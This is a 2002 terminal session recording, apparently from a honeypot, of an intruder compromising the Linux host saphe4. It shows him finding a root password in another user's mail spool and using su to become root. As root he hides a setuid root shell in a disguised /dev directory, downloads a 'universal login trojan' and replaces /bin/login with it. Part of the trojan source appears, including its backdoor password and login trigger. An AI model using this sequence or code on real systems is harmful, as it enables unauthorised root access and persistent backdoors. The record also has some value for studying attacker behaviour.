Script started on Mon Jun 24 18:36:51 2002
[jdoe@saphe4 jdoe]$ id
uid=501(jdoe) gid=501(jdoe) groups=501(jdoe)
[jdoe@saphe4 jdoe]$ who
root     tty1     Jun 24 18:17
jdoe     pts/0    Jun 24 18:36
[jdoe@saphe4 jdoe]$ last -5
jdoe     pts/0        10.247.233.60    Mon Jun 24 18:36   still logged in
jdoe     pts/0        10.247.233.51    Mon Jun 24 18:32 - 18:32  (00:00)
jdoe     pts/0        10.247.233.51    Mon Jun 24 18:30 - 18:30  (00:00)
jdoe     pts/0        10.247.233.51    Mon Jun 24 18:28 - 18:28  (00:00)
jdoe     pts/0        10.247.233.51    Mon Jun 24 18:25 - 18:27  (00:01)

wtmp begins Sat Jun 15 09:32:20 2002
[jdoe@saphe4 jdoe]$ echo $SHELL
/bin/bash
[jdoe@saphe4 jdoe]$ ls -la
total 24
drwx------    2 jdoe     jdoe         4096 Jun 24 18:34 .
drwxr-xr-x    7 root     root         4096 Jun 24 06:48 ..
-rw-------    1 jdoe     jdoe            0 Jun 24 18:34 .bash_history
-rw-r--r--    1 jdoe     jdoe           24 Jun 24 06:48 .bash_logout
-rw-r--r--    1 jdoe     jdoe          259 Jun 24 17:46 .bash_profile
-rw-r--r--    1 jdoe     jdoe          124 Jun 24 06:48 .bashrc
-rw-r--r--    1 jdoe     jdoe         3394 Jun 24 06:48 .screenrc
[jdoe@saphe4 jdoe]$ /bin/csh
[jdoe@saphe4 ~]$ ls -lacat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rbarnett:x:500:500::/home/rbarnett:/bin/bash
jdoe:x:501:501:Test Account:/home/jdoe:/bin/bash
[jdoe@saphe4 ~]$ cat /etc/shadow
cat: /etc/shadow: Permission denied
[jdoe@saphe4 ~]$ .//cat /etc/group
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root
lp:x:7:daemon,lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
games:x:20:
gopher:x:30:
dip:x:40:
ftp:x:50:
nobody:x:99:
users:x:100:
floppy:x:19:
xfs:x:43:
console:x:31:
utmp:x:22:
pppusers:x:44:
popusers:x:45:
slipusers:x:46:
slocate:x:21:
rbarnett:x:500:
jdoe:x:501:
[jdoe@saphe4 ~]$ ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 06:51 ?        00:00:06 init [3]
root         2     1  0 06:51 ?        00:00:00 [kflushd]
root         3     1  0 06:51 ?        00:00:00 [kupdate]
root         4     1  0 06:51 ?        00:00:00 [kpiod]
root         5     1  0 06:51 ?        00:00:05 [kswapd]
root         6     1  0 06:52 ?        00:00:00 [mdrecoveryd]
bin        323     1  0 06:52 ?        00:00:00 [portmap]
root       338     1  0 06:53 ?        00:00:00 [lockd]
root       339   338  0 06:53 ?        00:00:00 [rpciod]
root       348     1  0 06:53 ?        00:00:00 [rpc.statd]
root       362     1  0 06:53 ?        00:00:00 [apmd]
root       413     1  0 06:53 ?        00:00:00 syslogd -m 0
root       422     1  0 06:53 ?        00:00:00 klogd
nobody     436     1  0 06:53 ?        00:00:00 [identd]
nobody     438   436  0 06:53 ?        00:00:00 [identd]
nobody     439   438  0 06:53 ?        00:00:00 [identd]
nobody     441   438  0 06:53 ?        00:00:00 [identd]
nobody     443   438  0 06:53 ?        00:00:00 [identd]
daemon     454     1  0 06:53 ?        00:00:00 /usr/sbin/atd
root       468     1  0 06:53 ?        00:00:00 crond
root       486     1  0 06:53 ?        00:00:00 inetd
root       500     1  0 06:53 ?        00:00:00 [lpd]
root       544     1  0 06:53 ?        00:00:00 sendmail: accepting connections on port 25
root       559     1  0 06:53 ?        00:00:00 gpm -t ps/2
xfs        593     1  0 06:53 ?        00:00:00 xfs -droppriv -daemon -port -1
root       632     1  0 06:53 tty2     00:00:00 [mingetty]
root       633     1  0 06:53 tty3     00:00:00 [mingetty]
root       634     1  0 06:53 tty4     00:00:00 [mingetty]
root       635     1  0 06:53 tty5     00:00:00 [mingetty]
root       636     1  0 06:53 tty6     00:00:00 [mingetty]
root      8686     1  0 18:17 tty1     00:00:00 login -- root
root      8687  8686  0 18:17 tty1     00:00:00 -bash
root      9043   486  0 18:36 ?        00:00:00 in.telnetd: 10.247.233.60
root      9044  9043  0 18:36 pts/0    00:00:00 login -- jdoe
jdoe      9045  9044  0 18:36 pts/0    00:00:00 -bash
jdoe      9065  9045  0 18:36 pts/0    00:00:00 bash /usr/bin/bash_check.sh
jdoe      9066  9065  0 18:36 pts/0    00:00:00 /usr/bin/bash_check
jdoe      9067  9066  0 18:36 pts/0    00:00:00 /usr/bin/bash_check
jdoe      9068  9067  0 18:36 pts/1    00:00:00 bash -i
jdoe      9081  9068  0 18:37 pts/1    00:00:00 -bin/csh
jdoe      9086  9081  0 18:38 pts/1    00:00:00 ps -ef
[jdoe@saphe4 ~]$ pwd
/home/jdoe
[jdoe@saphe4 ~]$ find / -type f -mtime -1 | xargs grep ro-i root | grep -i passwd > test
find: /home/ftp/bin: Permission denied
find: /home/ftp/etc: Permission denied
find: /home/rbarnett: Permission denied
find: /var/lib/nfs/sm: Permission denied
find: /var/lib/nfs/sm.bak: Permission denied
find: /var/lib/slocate: Permission denied
find: /var/log/samba: Permission denied
find: /var/spool/at: Permission denied
find: /var/spool/cron: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
find: /proc/3/fd: Permission denied
find: /proc/4/fd: Permission denied
find: /proc/5/fd: Permission denied
find: /proc/6/fd: Permission denied
find: /proc/323/fd: Permission denied
find: /proc/338/fd: Permission denied
find: /proc/339/fd: Permission denied
find: /proc/348/fd: Permission denied
find: /proc/362/fd: Permission denied
find: /proc/413/fd: Permission denied
find: /proc/422/fd: Permission denied
find: /proc/436/fd: Permission denied
find: /proc/438/fd: Permission denied
find: /proc/439/fd: Permission denied
find: /proc/441/fd: Permission denied
find: /proc/443/fd: Permission denied
find: /proc/454/fd: Permission denied
find: /proc/468/fd: Permission denied
find: /proc/486/fd: Permission denied
find: /proc/500/fd: Permission denied
find: /proc/544/fd: Permission denied
find: /proc/559/fd: Permission denied
find: /proc/593/fd: Permission denied
find: /proc/632/fd: Permission denied
find: /proc/633/fd: Permission denied
find: /proc/634/fd: Permission denied
find: /proc/635/fd: Permission denied
find: /proc/636/fd: Permission denied
find: /proc/8686/fd: Permission denied
find: /proc/8687/fd: Permission denied
find: /proc/9043/fd: Permission denied
find: /proc/9044/fd: Permission denied
find: /proc/9088/fd/4: No such file or directory
find: /etc/default: Permission denied
find: /root: Permission denied
grep: /var/lib/nfs/state: Permission denied
grep: /var/log/messages: Permission denied
grep: /var/log/secure: Permission denied
grep: /var/log/maillog: Permission denied
grep: /var/log/xferlog: Permission denied
grep: /var/log/cron: Permission denied
grep: /var/run/random-seed: Permission denied
grep: /var/spool/mail/root: Permission denied
grep: /var/spool/mqueue/qfMAA04625: Permission denied
grep: /var/spool/mqueue/dfMAA04625: Permission denied
grep: /proc/ide/ide1/hdc/settings: Permission denied
grep: /proc/ide/ide1/hdc/identify: Permission denied
grep: /proc/kcore: Permission denied
grep: /proc/sys/net/ipv4/route/flush: Invalid argument
grep: /proc/sys/net/unix/max_dgram_qlen: Permission denied
grep: /proc/sys/vm/page-cluster: Permission denied
grep: /proc/sys/vm/pagetable_cache: Permission denied
grep: /proc/sys/vm/bdflush: Permission denied
grep: /proc/sys/kernel/cap-bound: Permission denied
grep: /proc/net/ip_fwnames: Permission denied
grep: /proc/net/ip_fwchains: Permission denied
grep: /proc/kmsg: Permission denied
grep: /proc/1/environ: Permission denied
grep: /proc/1/mem: Permission denied
grep: /proc/2/environ: Permission denied
grep: /proc/2/mem: Permission denied
grep: /proc/3/environ: Permission denied
grep: /proc/3/mem: Permission denied
grep: /proc/4/environ: Permission denied
grep: /proc/4/mem: Permission denied
grep: /proc/5/environ: Permission denied
grep: /proc/5/mem: Permission denied
grep: /proc/6/environ: Permission denied
grep: /proc/6/mem: Permission denied
grep: /proc/323/environ: Permission denied
grep: /proc/323/mem: Permission denied
grep: /proc/338/environ: Permission denied
grep: /proc/338/mem: Permission denied
grep: /proc/339/environ: Permission denied
grep: /proc/339/mem: Permission denied
grep: /proc/348/environ: Permission denied
grep: /proc/348/mem: Permission denied
grep: /proc/362/environ: Permission denied
grep: /proc/362/mem: Permission denied
grep: /proc/413/environ: Permission denied
grep: /proc/413/mem: Permission denied
grep: /proc/422/environ: Permission denied
grep: /proc/422/mem: Permission denied
grep: /proc/436/environ: Permission denied
grep: /proc/436/mem: Permission denied
grep: /proc/438/environ: Permission denied
grep: /proc/438/mem: Permission denied
grep: /proc/439/environ: Permission denied
grep: /proc/439/mem: Permission denied
grep: /proc/441/environ: Permission denied
grep: /proc/441/mem: Permission denied
grep: /proc/443/environ: Permission denied
grep: /proc/443/mem: Permission denied
grep: /proc/454/environ: Permission denied
grep: /proc/454/mem: Permission denied
grep: /proc/468/environ: Permission denied
grep: /proc/468/mem: Permission denied
grep: /proc/486/environ: Permission denied
grep: /proc/486/mem: Permission denied
grep: /proc/500/environ: Permission denied
grep: /proc/500/mem: Permission denied
grep: /proc/544/environ: Permission denied
grep: /proc/544/mem: Permission denied
grep: /proc/559/environ: Permission denied
grep: /proc/559/mem: Permission denied
grep: /proc/593/environ: Permission denied
grep: /proc/593/mem: Permission denied
grep: /proc/632/environ: Permission denied
grep: /proc/632/mem: Permission denied
grep: /proc/633/environ: Permission denied
grep: /proc/633/mem: Permission denied
grep: /proc/634/environ: Permission denied
grep: /proc/634/mem: Permission denied
grep: /proc/635/environ: Permission denied
grep: /proc/635/mem: Permission denied
grep: /proc/636/environ: Permission denied
grep: /proc/636/mem: Permission denied
grep: /proc/8686/environ: Permission denied
grep: /proc/8686/mem: Permission denied
grep: /proc/8687/environ: Permission denied
grep: /proc/8687/mem: Permission denied
grep: /proc/9043/environ: Permission denied
grep: /proc/9043/mem: Permission denied
grep: /proc/9044/environ: Permission denied
grep: /proc/9044/mem: Permission denied
grep: /proc/9045/mem: No such process
grep: /proc/9065/mem: No such process
grep: /proc/9066/mem: No such process
grep: /proc/9067/mem: No such process
grep: /proc/9068/mem: No such process
grep: /proc/9081/mem: No such process
grep: /proc/9088/statm: No such file or directory
grep: /proc/9088/stat: No such file or directory
grep: /proc/9088/cmdline: No such file or directory
grep: /proc/9088/environ: No such file or directory
grep: /proc/9088/mem: No such file or directory
grep: /proc/9088/status: No such file or directory
grep: /etc/group-: Permission denied
grep: /etc/shadow-: Permission denied
grep: /etc/gshadow-: Permission denied
grep: /etc/shadow: Permission denied
grep: /etc/gshadow: Permission denied
grep: /etc/ioctl.save: Permission denied
[jdoe@saphe4 ~]$ ls -l
total 4
-rw-rw-r--    1 jdoe     jdoe          348 Jun 24 18:38 test
[jdoe@saphe4 ~]$ cat test
/var/spool/mail/rbarnett:Here is the new root passwd - <C3_P0>
/etc/passwd:root:x:0:0:root:/root:/bin/bash
/etc/passwd:operator:x:11:0:operator:/root:
/etc/passwd-:root:x:0:0:root:/root:/bin/bash
/etc/passwd-:operator:x:11:0:operator:/root:
[jdoe@saphe4 ~]$ su root
Password:
su: incorrect password
[jdoe@saphe4 ~]$ su root
Password:
su: incorrect password
[jdoe@saphe4 ~]$ su root
Password:
[root@saphe4 jdoe]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@saphe4 jdoe]# pwd
/home/jdoe
[root@saphe4 jdoe]# who
root     tty1     Jun 24 18:17
jdoe     pts/0    Jun 24 18:36
[root@saphe4 jdoe]# mkdir /dev/".. "
[root@saphe4 jdoe]# cd /dev/".. "
[root@saphe4 .. ]# cp /bin/sh .
[root@saphe4 .. ]# ls -l
total 313
-rwxr-xr-x    1 root     root       316848 Jun 24 18:40 sh
[root@saphe4 .. ]# chmod 4555 sh
[root@saphe4 .. ]# mv sh test
[root@saphe4 .. ]# ls -l
total 313
-r-sr-xr-x    1 root     root       316848 Jun 24 18:40 test
[root@saphe4 .. ]# ftp 10.XXX.XXX.60
Connected to 10.XXX.XXX.60.
220 saphe2 FTP server (This system is for authorized users only. All transfers are logged.) ready.
Name (10.247.233.60:root): jdoe
331 Password required for jdoe.
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> user jdoe
331 Password required for jdoe.
Password:
230 User jdoe logged in.
ftp> bin
200 Type set to I.
ftp> hash
Hash mark printing on (1024 bytes/hash mark).
ftp> get bingo.c
local: bingo.c remote: bingo.c
200 PORT command successful.
150 Binary data connection for bingo.c (10.XXX.XXX.53,1041) (1346 bytes).
#
226 Binary Transfer complete.
1346 bytes received in 0.0032 secs (4.1e+02 Kbytes/sec)
ftp> bye
221 Goodbye.
[root@saphe4 .. ]# ls
test  bingo.c
[root@saphe4 .. ]# vu   i bingo.c
[?1h="bingo.c" 51L, 1346C/*
 * PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
 *      Universal login trojan by Tragedy/Dor
 *Email: rawpower@iname.com
 *IRC: [Dor]@ircnet
 *
 *      Login trojan for pretty much any O/S...
 *      Tested on:   Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
 *OSF1/DGUX4.0,
 *      Known not to work on:
 *SunOS 4.x and 5.4... Seems the only variable passwd to login
 *on these versions of SunOS is the $TERM... and its passed via
 *commandline option... should be easy to work round in time
 *
 *   #definePASSWORD  - Set your password here
 *   #define_PATH_LOGIN - This is where you moved the original login to
 *  login to hacked host with...
 *  from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host
 *
 */

#include<stdio.h>
#if !defined(PASSWORD)
#definePASSWORD"j4l0n3n"
#endif
#if !defined(_PATH_LOGIN)
# define_PATH_LOGIN     "/bin/login"
#endif
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

#define PASSWOR "j4l4l0n3n"l0n3n"0n3n"n3n"3n"n""-- INSERT --t"o"o"r"    "/in/login"n/login"/login"
 

-- INSERT --d/login"e/login"v/login"//login"./login"./login" /login"
 

:wq!
"bingo.c" 51L, 1347C written
[?1l>
[root@saphe4 .. ]# gcc -o login.new bingo.c
ulogin.c: In function `main':
ulogin.c:35: warning: initialization makes pointer from integer without a cast
[root@saphe4 .. ]# ls -l
total 329
-rwxrwxr-x    1 root     root        12344 Jun 24 18:41 login.new
-r-sr-xr-x    1 root     root       316848 Jun 24 18:40 test
-rw-rw-r--    1 root     root         1347 Jun 24 18:41 bingo.c
[root@saphe4 .. ]# mv /bin/login .
[root@saphe4 .. ]# cp logion  n.new /bin/login
[root@saphe4 .. ]# ls -l
total 350
-rwxr-xr-x    1 root     root        20452 Mar  7  2000 login
-rwxrwxr-x    1 root     root        12344 Jun 24 18:41 login.new
-r-sr-xr-x    1 root     root       316848 Jun 24 18:40 test
-rw-rw-r--    1 root     root         1347 Jun 24 18:41 bingo.c
[root@saphe4 .. ]# exit
exit
[jdoe@saphe4 ~]$ id
uid=501(jdoe) gid=501(jdoe) groups=501(jdoe)
[jdoe@saphe4 ~]$ /dev/..".. "/test
[jdoe@saphe4 jdoe]# id
uid=501(jdoe) gid=501(jdoe) euid=0(root) groups=501(jdoe)
[jdoe@saphe4 jdoe]# exit
exit
[jdoe@saphe4 ~]$ id
uid=501(jdoe) gid=501(jdoe) groups=501(jdoe)
[jdoe@saphe4 ~]$ echo $DISPLAY
saphe2:10.0
[jdoe@saphe4 ~]$ DISPLAY=toor
DISPLAY=toor: Command not found.
[jdoe@saphe4 ~]$ echo $SHELL
/bin/bash
[jdoe@saphe4 ~]$ exit
exit
[jdoe@saphe4 jdoe]$ DISPLAY=toor            ls -la
total 32
drwx------    2 jdoe     jdoe         4096 Jun 24 18:38 .
drwxr-xr-x    7 root     root         4096 Jun 24 06:48 ..
-rw-------    1 jdoe     jdoe           8 Jun 24 18:42 .bash_history
-rw-r--r--    1 jdoe     jdoe           24 Jun 24 06:48 .bash_logout
-rw-r--r--    1 jdoe     jdoe          259 Jun 24 17:46 .bash_profile
-rw-r--r--    1 jdoe     jdoe          124 Jun 24 06:48 .bashrc
-rw-r--r--    1 jdoe     jdoe         3394 Jun 24 06:48 .screenrc
-rw-rw-r--    1 jdoe     jdoe          348 Jun 24 18:38 test
[jdoe@saphe4 jdoe]$ history
    1  id
    2  who
    3  last -5
    4  echo $SHELL
    5  /bin/csh
    6  ls -la
    7  history
[jdoe@saphe4 jdoe]$ exit
exit

Script done on Mon Jun 24 18:43:48 2002
MD5 (/tmp/.Xconfig.old) = 8380d80f727c35fcded5a3ec66876b1b
 sent 0, rcvd 18092